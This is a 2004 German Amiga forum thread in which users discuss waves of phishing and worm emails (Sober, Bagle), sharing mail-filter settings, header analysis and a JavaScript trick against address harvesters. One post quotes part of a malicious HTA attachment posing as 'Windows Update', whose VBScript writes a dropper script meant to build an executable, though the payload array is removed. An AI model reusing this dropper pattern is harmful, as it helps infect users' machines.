amiga-news ENGLISH VERSION
.
Links| Forum| Kommentare| News melden
.
Chat| Umfragen| Newsticker| Archiv
.

amiga-news.de Forum > Amiga, AmigaOS 4 > Komische E-Mails [ - Suche - Neue Beiträge - Registrieren - Login - ]

-1- 2 [ - Beitrag schreiben - ]

26.11.2004, 07:43 Uhr

langer
Posts: 202
Nutzer
Hi

Seit 4 Tagen erhalte ich E-Mails, mit denen ich nichts anfangen kann.
Alle haben einen Anhang den ich aber nicht geöffnet habe. Die Absender
sind mir durchweg unbekannt.

Die E-Mails haben folgenden Inhalt:

Guten Tag,
da unsere Datenbank leider durch einen Programm Fehler zerstört
wurde, mussten wir leider eine Änderung bezüglich Ihrer
Nutzungs-Daten vornehmen. Ihre geänderten Account Daten, befinden
Sie im beigefügten Dokument.
Vielen Dank für Ihr Verständnis

Die Rechtschreibefehler sind so im Originaltext.

oder

Diese E-Mail wurde automatisch generiert
Weitere Informationen erhalten Sie unter ....Internet-Adresse

Danach folgt eine Auflistung mir unverständlicher Fehlerangaben,
die beim Übertragen einer E-Mail von mir aufgetreten sind. Das
Dumme daran ist, ich habe seit mehreren Tagen keine E-Mail mehr
abgeschickt.

Kann mir von Euch einer erklären, was da los ist ? Mir fehlen da
die notwendigen Kenntnisse.

Danke langer

[ - Antworten - Zitieren - Direktlink - ]

26.11.2004, 08:11 Uhr

Crystal
Posts: 412
Nutzer
mails mit anhang unbekannter herkunft IMMER löschen. (erste regel!)
im anhang verbergen sich viren und trojaner.
typische bauernfängerei, um an nutzerdaten ranzukommen...

wenn du irgendwo registriert bist, wirst du normalerweise mit namen angesprochen und nicht mit 'guten tag'.
ferner kann man solche phishing-mails auch an der falschen rechtschreibung erkennen bzw. wenn der text als grafik eingebunden ist.

es lohnt nicht, weiter drüber nachzudenken - einfach weg damit. :O

[ - Antworten - Zitieren - Direktlink - ]

26.11.2004, 08:39 Uhr

langer
Posts: 202
Nutzer
Eben kam eine weitere Mail dieser Art.

Absender: webmaster@web.de

Inhalt:

Auftragsbestätigung

Weitere Informationen befinden sich im Anhang dieser
Mail.


Bisher wurde ich von solchen Mails verschont. Aber wie
gesagt, seit ein paar Tagen ist das anders. Ärgerlich ist,
daß der Anhang dieser Mails sehr groß ist und daß es ca. 10
Stück täglich sind. Das braucht immer seine Zeit. Ich bin
mit einem analogen 56k-Modem im Netz.

Kann man in YAM einen Filter so einstellen, das nur Mails
vom Server geladen werden, dessen Absender in meinem
Adressbuch stehen ?

Gruß langer

[ - Antworten - Zitieren - Direktlink - ]

26.11.2004, 08:50 Uhr

MarkusPohlmann
Posts: 164
Nutzer
Ich glaube, Du kannst bei YAM zumindest die Grösse einstellen, ab wann YAM per Requester vor dem Laden fragen soll, ob runterladen, löschen oder lassen. Wenn die Anhänge so gross könntest Du die Mails damit vielleicht schon vor dem Laden sehen und einfach auf dem Mailserver löschen.

[ - Antworten - Zitieren - Direktlink - ]

26.11.2004, 09:56 Uhr

ArminHuebner
Posts: 1349
Nutzer
@ langer

Stell im Konfigurationsmenu unter "Neue Post" Vorauswahl auf "immer"
sowie Transferfenster auf "immer zeigen".

Dann kannst du nach dem Druck auf "Holen" im Transferfenster auswählen, welche Nachrichten direkt
auf dem Server gelöscht und welche heruntergeladen werden sollen.

--
Gruß, Armin.
--
'Auch wenn alle einer Meinung sind, können alle Unrecht haben.'


[ Dieser Beitrag wurde von ArminHuebner am 26.11.2004 editiert. ]

[ - Antworten - Zitieren - Direktlink - ]

26.11.2004, 10:14 Uhr

AxleJackPad
Posts: 216
Nutzer
Regel 1 kann ich nur doppelt Unterstreichen. Niemals diese öffnen oder den darin enthaltenen Links folgen. Wenn du das machst, zeigst du dem Absender das die Adresse heiß ist, und dann müllt man dich erst richtig zu.
Entstehen kan das durch einen Eintrag in eine nicht ganz saubere Mailingliste, oder bestellungen bei Firmen die sich durch Adressen etwas dazuverdienen. Meistens muß man irgentwo einen kleinen Haken setzen, wenn man gegen die Weitergabe der Adresse ist, macht man das nicht ist man automatisch damit einverstanden.

Zu Punkt zwei.
Bietet dein Email-Provider einen Spamfilter an?
Wenn ja, ist die Frage wie der funktioniert. Vielleicht kann man YAM drauf einstellen, diesen zunutzen.

Das hat bei mit ganz gut funktionert.
80% werden schon vom Provider eingefangen.
15% werden vom Ihm mit einem Spam-Level Status versehen.
Ich habe YAM so konfiguriert, das Mails mit Spam Status schon auf dem Server gelöscht werden.
Nun schlag ich mich nur noch mit 5-15 Spammails am Tag rum.


--
Alex

Viele haben einen Computer, manche können damit auch umgehen.

[ - Antworten - Zitieren - Direktlink - ]

26.11.2004, 11:00 Uhr

aPEX
Posts: 4692
Nutzer
diese emails bekommst nicht nur du, auch bei mir im geschaeft kamen sie schon an.
ist ne neue welle von spam/trojaner. wenn man auf den link der seite geht, faengt man sich unter windows einen trojaner ein!

--
cu, aPEX :bounce:

:commo: A1200-3.1-OS3.9-Blizzard4/64mb :dance1:
:commo: A500-1.3/3.1-OS3.1-MTec Amigapower 68030-MTec AT500 :dance1:

[ - Antworten - Zitieren - Direktlink - ]

26.11.2004, 12:24 Uhr

AndreasM
Posts: 2476
Nutzer
Völlig normale Viren/SPAM mails. durch den neuen Wurm hab ich z.b. in 3 oder 4 Tagen 60 MB Viren bekommen. rund 20.000 SPAM Mails im Monat werden vom Server aussortiert bei uns.

Nach Absender filtern wird Dir nix bringen. Denn die Absender sind gefaked und dort werden oft auch einem bekannte Absender verwendet.

Die Beste Methode ist zu schaun ob es bei Deinem eMail-Anbieter keinen Viren/SPAM Filter gibt.

Oder Du sortierts per hand aus bevor du die MAisl vom Server runter lädst.

Alles andere hat relativ wenig Sinn.

--
Andreas Magerl
http://www.apc-tcp.de

http://www.amigafuture.de

http://www.digiboosterpro.de

http://www.kolonialkampf.de



[ - Antworten - Zitieren - Direktlink - ]

26.11.2004, 12:51 Uhr

TriMa
Posts: 2793
[Ex-Mitglied]
Glaube das ist dieser Sober Wurm, hab davon bis vor kurzen auch Massenweise bekommen, bis ich dann mein Web.de Account gekillt hab, hach ist das schön wenn man nur noch 3-5 Spams über Nacht bekommt statt wie vorher 30-50.
--
Founder of #Sarkasmus-pur@EuIRC

[ - Antworten - Zitieren - Direktlink - ]

26.11.2004, 13:50 Uhr

aPEX
Posts: 4692
Nutzer
kann da nur gmx empfehlen. die haben nen echt genialen
spamschutz der auch tut. zusaetzlich zu den angebotenen
automatischen funktionen, kann man noch eine blacklist
fuehren.

auf der stehen bei mir momentan die 48 uebelsten spammer-
domains (als beispiel *@mail.ru).

das ich mit sicherheit niemanden kenne der mir von mail.ru schreibt,
habe ich die domain komplett gekillt.

haben den namen vorne anfang auch taeglich gaendert... jetzt ist ruhe.

--
cu, aPEX :bounce:

:commo: A1200-3.1-OS3.9-Blizzard4/64mb :dance1:
:commo: A500-1.3/3.1-OS3.1-MTec Amigapower 68030-MTec AT500 :dance1:

[ - Antworten - Zitieren - Direktlink - ]

26.11.2004, 14:09 Uhr

langer
Posts: 202
Nutzer
Danke für die guten Tips. Ich habe erst mal den von
ArminHuebner ausprobiert. Das Aussortieren von Hand
geht tadellos. Der Vorteil dabei ist, es gehen keine
wichtigen Mails verloren. So lange es mit den ungewollten
Mails im überschaubaren Rahmen bleibt werde ich diese
Methode anwenden. Wenn es mehr wird, versuche ich, ob mir
mein Provider die Dinger vom Hals halten kann.


Danke Euch allen

langer

[ - Antworten - Zitieren - Direktlink - ]

26.11.2004, 14:31 Uhr

fatfred
Posts: 236
Nutzer
Zitat:
Original von aPEX:
das ich mit sicherheit niemanden kenne der mir von mail.ru schreibt,
habe ich die domain komplett gekillt.


Hmm, von mir würde somit auch keine Mail mehr zu Dir durchkommen...allerdings wüßte ich auch nicht, was ich Dir schreiben sollte :)



[ - Antworten - Zitieren - Direktlink - ]

26.11.2004, 15:02 Uhr

Mirko_Naumann
Posts: 715
Nutzer
Diese Mails sind schon eine Plage.

Bei mir kommen täglich bis zu 150 dieser Mails an. Zum Glück hab ich ein DSL-Flatrate. Da ist das
nicht weiter schlimm. Hab bei mir YAM so konfiguriert, daß zwar erst alle Mails runtergeladen
werden (geht bei DSL ziemlich schnell) und dann geht der Filter drüber.

In diesen Spammails gibts jede Menge Schlüsselworte, die sonst kein normaler User verwendet.
Damit kannst du prima den größten Teil der Mails aussortieren. Mußt dir nur eben etwas Zeit nehmen
den Filter zu konfigurieren.

Da bei mir alle Mails erstmal runtergeladen werden, geht auch keine wichtige Mail verloren, falls der
Filter mal versagt hat. Da reicht dann ein kurzes Überfliegen der Betreffs und Absender und gut.

Es gibt aber auch ziemlich gemeine Spammer, die die Absender mit Namen fälschen, die man
persönlich kennt. So kamen bei mir in den letzten Monaten z.B. locker 100 Mails angeblich von Chris
Hodges (alle schön verseucht). Wenn man dann aber über die IP die Herkunft zurück verfolgt, paßt
das meistens nicht zusammen.

Bei den angeblichen Chris Hodges Mails waren das komischerweise immer polnische Server. Bevor
jetzt aber jmd. was Böses denkt - ich glaube nicht, daß die von Elbox kamen auch wenn's
merkwürdig scheint (außer deren PC ist verseucht, das könnte schon sein, dann aber mit Sicherheit
ohne böse Absicht).

Das schöne am Amiga ist aber zum Glück, daß all diese verseuchten Mails rein gar nix ausrichten
können. Wenn du aber einen PC nutzt, dann ist höchste Vorsicht geboten.

Auf jeden Fall sollte man aber nichts tun, um denen zu zeigen, daß die Adresse, an die die Mail ging
(nämlich deine) auch existiert, also keine sogenannten Opt-Out, Remove oder sonstwie genannten
Links anklicken.

Die Spammer kaufen immer ganze Kontingente an Adressen (etliche Millionen auf CD) ohne sich
sicher sein zu können, ob es die auch tatsächlich gibt. Deshalb bauen die immer diese Links ein.

Wer sich jedoch die Mühe macht draufzuklicken oder seine Adresse auf deren Seiten eingibt, wird
mit Sicherheit weiterverkauft und landet damit auf den nächsten Adress-CDs und bekommt so noch
mehr unerwünschte Mails -> Schneeballsystem.

Also einfach ignorieren, wenn was kommt.

[ - Antworten - Zitieren - Direktlink - ]

26.11.2004, 16:12 Uhr

JoJo
Posts: 92
Nutzer
Hi langer

Erzeuge dir mit einem Text-Editor eine Datei mit dem Namen:
From-Remote-Filter.txt
In die Text-Datei schreibst du die Suffixes der Länder, aus denen du
sowieso keine Mail's bekommst, z.B.:

#?.com
#?.jp
#?.ar
#?.br
#?.ru
#?.ca
#?.net
#?.hu
#?.pl
#?.it
#?.uk
#?.edu
#?.ci
#?.au
#?.ch
#?.se
#?.il
#?.ae
#?.ie
#?.es
#?.ro
#?.gr
#?.fr
#?.org
#?.pt
#?.pk
#?.ph

Hier können auch komlette Adressen (z.B. von .de)eingegeben werden, die ganz sicher SPAM sind
Diese Datei speicherst du im YAM-Verzeichnis.
In YAM Konfigurieren anklicken und in Filter gehen.
Vergleich anklicken. Killfile anklicken.
Suchen in From-Zeile.
in From-Remote-Filter.txt .
Dann Speichern.
So werden schon die meisten Mail als Müll markiert.
--
JoJo :shoot2:






[ - Antworten - Zitieren - Direktlink - ]

26.11.2004, 16:15 Uhr

JoJo
Posts: 92
Nutzer
Hi langer

Erzeuge dir mit einem Text-Editor eine Datei mit dem Namen:
From-Remote-Filter.txt
In die Text-Datei schreibst du die Suffixes der Länder, aus denen du
sowieso keine Mail's bekommst, z.B.:

#?.com
#?.jp
#?.ar
#?.br
#?.ru
#?.ca
#?.net
#?.hu
#?.pl
#?.it
#?.uk
#?.edu
#?.ci
#?.au
#?.ch
#?.se
#?.il
#?.ae
#?.ie
#?.es
#?.ro
#?.gr
#?.fr
#?.org
#?.pt
#?.pk
#?.ph

Hier können auch komlette Adressen (z.B. von .de)eingegeben werden, die ganz sicher SPAM sind
Diese Datei speichers du im YAM-Verzeichnis.
In YAM Konfigurieren anklicken und in Filter gehen.
Vergleich anklicken. Killfile anklicken.
Suchen in From-Zeile.
in From-Remote-Filter.txt .
Dann Speichern.
So werden schon die meisten Mail als Müll markiert.
--
JoJo :shoot2:






[ - Antworten - Zitieren - Direktlink - ]

26.11.2004, 16:48 Uhr

CarstenS
Posts: 5566
Nutzer
> Es gibt aber auch ziemlich gemeine Spammer, die die Absender mit
> Namen fälschen, die man persönlich kennt.

Na ich denke eher, da hat sich ein (ehemaliger) Amiga-User infiziert, denn das sind keine Spam-Mails, sondern Mails mit angehängtem Virus/Trojaner, der das Adressbuch nach E-Mail-Adressen durchforstet. Scheinbar merkt die Person nicht, dass sein Rechner infiziert ist, denn ich bekomme schon seit etlichen Monaten Mails, die angeblich (u.a.) von Senex und Kato Development sind. Aber glücklicherweise filtert GMX die (sobald der Schädling erst mal bekannt ist).

[ - Antworten - Zitieren - Direktlink - ]

26.11.2004, 16:55 Uhr

AndreasM
Posts: 2476
Nutzer
Zitat:
Original von CarstenS:
> Es gibt aber auch ziemlich gemeine Spammer, die die Absender mit
> Namen fälschen, die man persönlich kennt.

Na ich denke eher, da hat sich ein (ehemaliger) Amiga-User infiziert, denn das sind keine Spam-Mails, sondern Mails mit angehängtem Virus/Trojaner, der das Adressbuch nach E-Mail-Adressen durchforstet. Scheinbar merkt die Person nicht, dass sein Rechner infiziert ist, denn ich bekomme schon seit etlichen Monaten Mails, die angeblich (u.a.) von Senex und Kato Development sind. Aber glücklicherweise filtert GMX die (sobald der Schädling erst mal bekannt ist).


unwahrscheinlich. so bekomm ich z.b. oft spam mit meiner eigenen absenderadresse oder erfundene usernamen mit meinen domains. usernamen die aber nie exestierten und so auch in keinen adressbuch sein können.

oft ist es der falls das seiten gescannt werden und die dortigen emailadressen dann im zusammenhang gebracht werden.

aber egal wie sie es machen. nerven tuts so oder so. jedes mal online gehen erst mal 1-3 MB viren laden :/


--
Andreas Magerl
http://www.apc-tcp.de

http://www.amigafuture.de

http://www.digiboosterpro.de

http://www.kolonialkampf.de



[ - Antworten - Zitieren - Direktlink - ]

26.11.2004, 17:04 Uhr

CarstenS
Posts: 5566
Nutzer
@AndreasM:
> oft ist es der falls das seiten gescannt werden und die dortigen
> emailadressen dann im zusammenhang gebracht werden.

Stimmt, aber das machen nur Spammer, keine Viren. Und ich rede von Viren-Mails. :)

[ - Antworten - Zitieren - Direktlink - ]

26.11.2004, 17:11 Uhr

Maja
Posts: 15429
Nutzer
Zitat:
Original von CarstenS:
Na ich denke eher, da hat sich ein (ehemaliger) Amiga-User infiziert, denn das sind keine Spam-Mails, sondern Mails mit angehängtem Virus/Trojaner, der das Adressbuch nach E-Mail-Adressen durchforstet. Scheinbar merkt die Person nicht, dass sein Rechner infiziert ist, denn ich bekomme schon seit etlichen Monaten Mails, die angeblich (u.a.) von Senex und Kato Development sind. Aber glücklicherweise filtert GMX die (sobald der Schädling erst mal bekannt ist).


Scheint so. Und wenn er es endlich merkt, wird er Windows die Schuld geben....

Wenn du solche Mail bekommst, müsste es jemand sein, den du kennst, bzw. mit dem mal Kontakt hattest.

Wenn also hier jemand mitliest, der vor kurzem auf Windows umgestiegen ist, keinen Virenschutz installiert und zudem noch Carstens Adresse im Adressbuch hat, der sollte schleunigst mal ein Antivirenprogramm installieren und/oder sein System scannen lassen.



[ - Antworten - Zitieren - Direktlink - ]

26.11.2004, 17:31 Uhr

CarstenS
Posts: 5566
Nutzer
Ich habe mal in den Header von einigen Mails geschaut, da taucht jeweils #?.aol.com auf. Nicht, dass es sich noch um Petros Rechner handelt. ;)

[ - Antworten - Zitieren - Direktlink - ]

26.11.2004, 19:05 Uhr

Flinx
Posts: 1073
Nutzer
Zitat:
Original von CarstenS:
Ich habe mal in den Header von einigen Mails geschaut, da taucht jeweils #?.aol.com auf.


Alles gefälscht. Bei SOBER.I kann man sich nur auf die IP-Adresse des einliefernden Rechners verlassen, die der eigene Mailserver registriert hat. Das ist dann ähnlich wie bei den Spammails.
Wenn es sich um einen Einwahlaccount handelt, ist es durchaus sinnvoll, den Provider zu informieren, der dann seinerseits seinen Kunden über das Problem informiert.
Es ist übrigens verblüffend, wie viele Leute immer noch auf diese Texte reinfallen. Wenn wir auf Arbeit nicht TrendMicros Scanner laufen hätten (die mir zwei- bis fünfmal am Tag mitteilen, daß schon wieder jemand auf so einen Anhang geklickt hat), wären eine ganze Menge PCs inzwischen mit Dingen beschäftigt, für die sie nicht gekauft worden sind...

[ - Antworten - Zitieren - Direktlink - ]

26.11.2004, 19:51 Uhr

CarstenS
Posts: 5566
Nutzer
@Flinx:
> Alles gefälscht.

Wie soll das technisch möglich sein? Die Header-Informationen werden doch von dem Ausgangsserver (oder ersten Eingangsserver) angelegt und dann von den durchlaufenden Servern immer weiter ergänzt. M.E. können nur Mailinhalte gefälscht werden, die der User selbst angeben kann, etwa die Absenderadresse.

[ Dieser Beitrag wurde von CarstenS am 26.11.2004 editiert. ]

[ - Antworten - Zitieren - Direktlink - ]

27.11.2004, 01:41 Uhr

Maja
Posts: 15429
Nutzer
Zitat:
Original von Flinx:
Es ist übrigens verblüffend, wie viele Leute immer noch auf diese Texte reinfallen. Wenn wir auf Arbeit nicht TrendMicros Scanner laufen hätten (die mir zwei- bis fünfmal am Tag mitteilen, daß schon wieder jemand auf so einen Anhang geklickt hat), wären eine ganze Menge PCs inzwischen mit Dingen beschäftigt, für die sie nicht gekauft worden sind...


Mir stellt sich bei sowas regelmäßig die Frage, ob diese Leute sich zuhause am eigenen Rechner auch so verhalten. Es kommt mir so vor, als würden sie nach dem Motto vorgehen: "Ist ja nicht mein Rechner. Also klick ich mal drauf, weil ich das schon immer mal tun wollte".



[ - Antworten - Zitieren - Direktlink - ]

27.11.2004, 10:12 Uhr

Flinx
Posts: 1073
Nutzer
Zitat:
Original von CarstenS:
Wie soll das technisch möglich sein? Die Header-Informationen werden doch von dem Ausgangsserver (oder ersten Eingangsserver) angelegt und dann von den durchlaufenden Servern immer weiter ergänzt.


Du hast natürlich recht (man sollte immer das Gehirn vor dem Schreiben einschalten...). Bei Wurm-Mails, die ja üblicherweise von normalen Accounts versandt werden, ist mit einer Fälschung der Namensauflösung nicht zu rechnen. Das heißt, das was ein aktueller Mailserver aus der Reversauflösung entnimmt und in die Received-Zeile schreibt, wird in dem Fall wahrscheinlich stimmen.
Bei Spam ist das allerdings anders, dort können gewiefte Spammer durchaus dafür sorgen, daß eine unbeteiligte Domain erscheint, und man sich nur noch auf die IP verlassen kann.
Die meisten Sober-Mails, die ich bisher gesehen habe, sind von irgendwelchen Einwahlaccounts (z.B. dip.t-dialin.net) gekommen.

[ - Antworten - Zitieren - Direktlink - ]

27.11.2004, 10:35 Uhr

Flinx
Posts: 1073
Nutzer
Zitat:
Original von Maja:
Mir stellt sich bei sowas regelmäßig die Frage, ob diese Leute sich zuhause am eigenen Rechner auch so verhalten. Es kommt mir so vor, als würden sie nach dem Motto vorgehen: "Ist ja nicht mein Rechner. Also klick ich mal drauf, weil ich das schon immer mal tun wollte".


Das kann schon sein, zumal ja bekannt ist, daß ein Virenscanner läuft.
Wenn ich die Leute daraufhin angesprochen habe, bekomme ich aber meistens Antworten wie "Ich muß doch aber sehen, was die mir geschickt haben.", und ich habe zumindest bei manchen den Eindruck, daß sie wirklich so naiv sind. Und da die Würmer ja zumindest bei mir fast immer von Einwahlzugängen kommen, scheinen es jedenfalls genügend Unbedarfte auch zu Hause so zu machen.
Einmal ist einer dieser Würmer auch schon durchgekommen (das war dann der Grund, das Aktualisierungsintervall für die Virensignaturen auf eine Stunde zu verkürzen). Ein Sekretariatsazubi hatte sich das Teil installiert, und man konnte schön im Firewall-Log mitansehen, wie er versucht hat, sich an alle innerhalb des eigenen Firmennetzes bekannten Adressen zu versenden und dann mit dem Internet weitergemacht hat. Zum Glück hat aber der Mailserver für SMTP von außen eine andere IP-Adresse als von innen und das konnte der Wurm nicht wissen (da er den Mailserver natürlich aus dem DNS entnimmt), so daß er nichts versenden konnte, weil die normalen Benutzer an diese Adresse nicht herankommen.

[ - Antworten - Zitieren - Direktlink - ]

27.11.2004, 11:44 Uhr

Eule
Posts: 1607
Nutzer
Zitat:
Original von CarstenS:
> Es gibt aber auch ziemlich gemeine Spammer, die die Absender mit
> Namen fälschen, die man persönlich kennt.

Na ich denke eher, da hat sich ein (ehemaliger) Amiga-User infiziert,


Nicht unbedingt, man landet sehr schnell in Spam listen und einige dieser Spamlisten wurde auch schon für Viren missbraucht.

So werden manche Spams (und Viren) unter dem Namen das Amiga-Club Mitglieds Granada verschickt.

Ich bekomme auch verstärkte Virenverseuchte EMail von mobie@t-online.de und soweit mir bekannt wurde meine EMail Adresse auch schon für irgendwelche braune Nazi Spams missbraucht.

Machmal lohnt sich die Eingabe der Returnadresse im Filter von YAM ( z.B. bei Mobie )


cu Eule


[ - Antworten - Zitieren - Direktlink - ]

27.11.2004, 13:32 Uhr

CarstenS
Posts: 5566
Nutzer
@Eule:
> So werden manche Spams (und Viren) unter dem Namen das Amiga-Club
> Mitglieds Granada verschickt.

Wie gesagt, man muss unterscheiden. Spams werden von Spammern verschickt, und die finden die Adressen entweder im Internet, durch Ankauf oder Ausprobieren. Mail-Viren dagegen durchsuchen den infizierten Rechner nach Adressen. Falls es bereits Viren gibt, die das Internet durchsuchen, dann mit Sicherheit keine mit einem so ausgeklügelten Algorithmus, dass sie dort mir bekannte E-Mail-Adressen finden.
Und da zumindest ich Mail-Viren mit z.B. senex@gmx.de als Absenderadresse erhalte, die der Virus offenbar über einen AOL-Account verschickt, sehe ich nur die Möglichkeit, dass es sich um den Rechner eines AOL-Nutzers handelt, der Kontakt zu (heutigen und früheren) Amiga-Usern und -Firmen (z.B. Kato Development) hat(te).

[ - Antworten - Zitieren - Direktlink - ]

27.11.2004, 13:49 Uhr

Eule
Posts: 1607
Nutzer
Kleiner Tipp für Homepage Betreiber:

Man muss ja als Betreiber eine WWW-Seite die EMail Adresse angeben (Impressum) jetzt will man aber nicht dass die Robotter von irgendwelchen Spam Versendern die Adresse finden.

Entweder gibt man die Adrese als Bild an oder schreibt einen Text der die EMail Adresse nicht direkt als String enthält oder man schreibt sie als JavaScript:

Im Header:

<script language="javascript">
<!--
function email(){
var mailnam="malibann";
var maildom="t-online.de";
var mailarg="?subject=Deine WWW-Seite";
document.write('<a href="mailto:'+mailnam+'@'+maildom+mailarg+'">'+mailnam+'@'+m aildom+'</a>.');
}

und irgendwo im Text dann:

<P>Webmaster und Author: Eule<BR>
Email:<script>email()</script>

cu Eule

[ - Antworten - Zitieren - Direktlink - ]

27.11.2004, 14:01 Uhr

Eule
Posts: 1607
Nutzer
Zitat:
Original von CarstenS:
@Eule:
> So werden manche Spams (und Viren) unter dem Namen das Amiga-Club
> Mitglieds Granada verschickt.

Wie gesagt, man muss unterscheiden. Spams werden von Spammern verschickt, und die finden die Adressen entweder im Internet, durch Ankauf oder Ausprobieren. Mail-Viren dagegen durchsuchen den infizierten Rechner nach Adressen.


Ich finde dass man nicht unterscheiden muss !

Ich habe gerade eine EMail mit dem Absender jessie@t-online.de
darin befindet sich warscheinlich ein ein Virus mit der Endung .hta.

Da ich keine Jessie kenne, bin ich zu 100% sicher dass der Virus Versender meine EMail nicht von einen infozierten Rechner hat.

Es könnte sich natürlich auch um einen Dialer oder Trojaner handeln. Bekanntlich werden auch Rechner in der Absicht indendifieziert sie zum Versenden von EMails ferzunsteuern.

Meiner Meinung nach sind die Übergänge zwischen Spam, Dialer und Virus fliesend.

Rechner weden mit Viren/Trojanern infiziert und auch zum Versenden von Spam missbraucht.


cu Eule

---

BTW. Ein Teil des Virenscripts:

<HTML>
<HEAD>
<TITLE>Windows Update</TITLE>
<HTA:APPLICATION ID="Q" APPLICATIONNAME="Q" BORDER="none" BORDERSTYLE="normal" CAPTION="no" ICON="" CONTEXTMENU="no" MAXIMIZEBUTTON="no" MINIMIZEBUTTON="no" SHOWINTASKBAR="no" SINGLEINSTANCE="no" SYSMENU="no" VERSION="1.0" WINDOWSTATE="minimize"/>
<SCRIPT LANGUAGE="VBScript">
MyFile = "qq.vbs"
Set FSO = CreateObject("Scripting.FileSystemObject")
Set TSO = FSO.CreateTextFile(MyFile, True)
TSO.write "dim filesys, filetxt, getname, path, textfile, i" & vbcrlf
TSO.write "textfile = ""bbbs.exe""" & vbcrlf
TSO.write "Set filesys = CreateObject(""Scripting.FileSystemObject"")" & vbcrlf
TSO.write "Set filetxt = filesys.CreateTextFile(textfile, True)" & vbcrlf
TSO.write "getname = filesys.GetFileName(path)" & vbcrlf
TSO.write "dim a" & vbcrlf
TSO.write "a=Array (gelöscht)

Nachtrag: Ich habe eben erst gemerkt, dass das Array das beim Virenscript dabei war, reinkopiert wurde. Die Datenmenge brachte IBrowse zum Absturz. Ich habe die Daten jetzt wieder entfernt.

[ Dieser Beitrag wurde von Eule am 27.11.2004 editiert. ]

[ - Antworten - Zitieren - Direktlink - ]

27.11.2004, 14:35 Uhr

CarstenS
Posts: 5566
Nutzer
@Eule:
> Da ich keine Jessie kenne, bin ich zu 100% sicher dass der Virus
> Versender meine EMail nicht von einen infozierten Rechner hat.

Dass du sie nicht kennst, bedeutet aber nicht zwangsläufig, dass sie deine Adresse nicht in ihrem Adressbuch hat...

> Es könnte sich natürlich auch um einen Dialer oder Trojaner
> handeln.

Bei mir handelt es sich um den Wurm Bagle.AP. Und der findet die Adressen wirklich (nur!) auf dem infizierten Rechner. Wenn du willst, kann ich dir eine der Mails zusenden.

> Meiner Meinung nach sind die Übergänge zwischen Spam, Dialer und
> Virus fliesend.

M.E. sind das völlig unterschiedliche Dinge. Nur können Laien sie nicht immer auseinanderhalten.

[ Dieser Beitrag wurde von CarstenS am 27.11.2004 editiert. ]

[ - Antworten - Zitieren - Direktlink - ]


-1- 2 [ - Beitrag schreiben - ]


amiga-news.de Forum > Amiga, AmigaOS 4 > Komische E-Mails [ - Suche - Neue Beiträge - Registrieren - Login - ]


.
Impressum | Datenschutzerklärung | Netiquette | Werbung | Kontakt
Copyright © 1998-2022 by amiga-news.de - alle Rechte vorbehalten.
.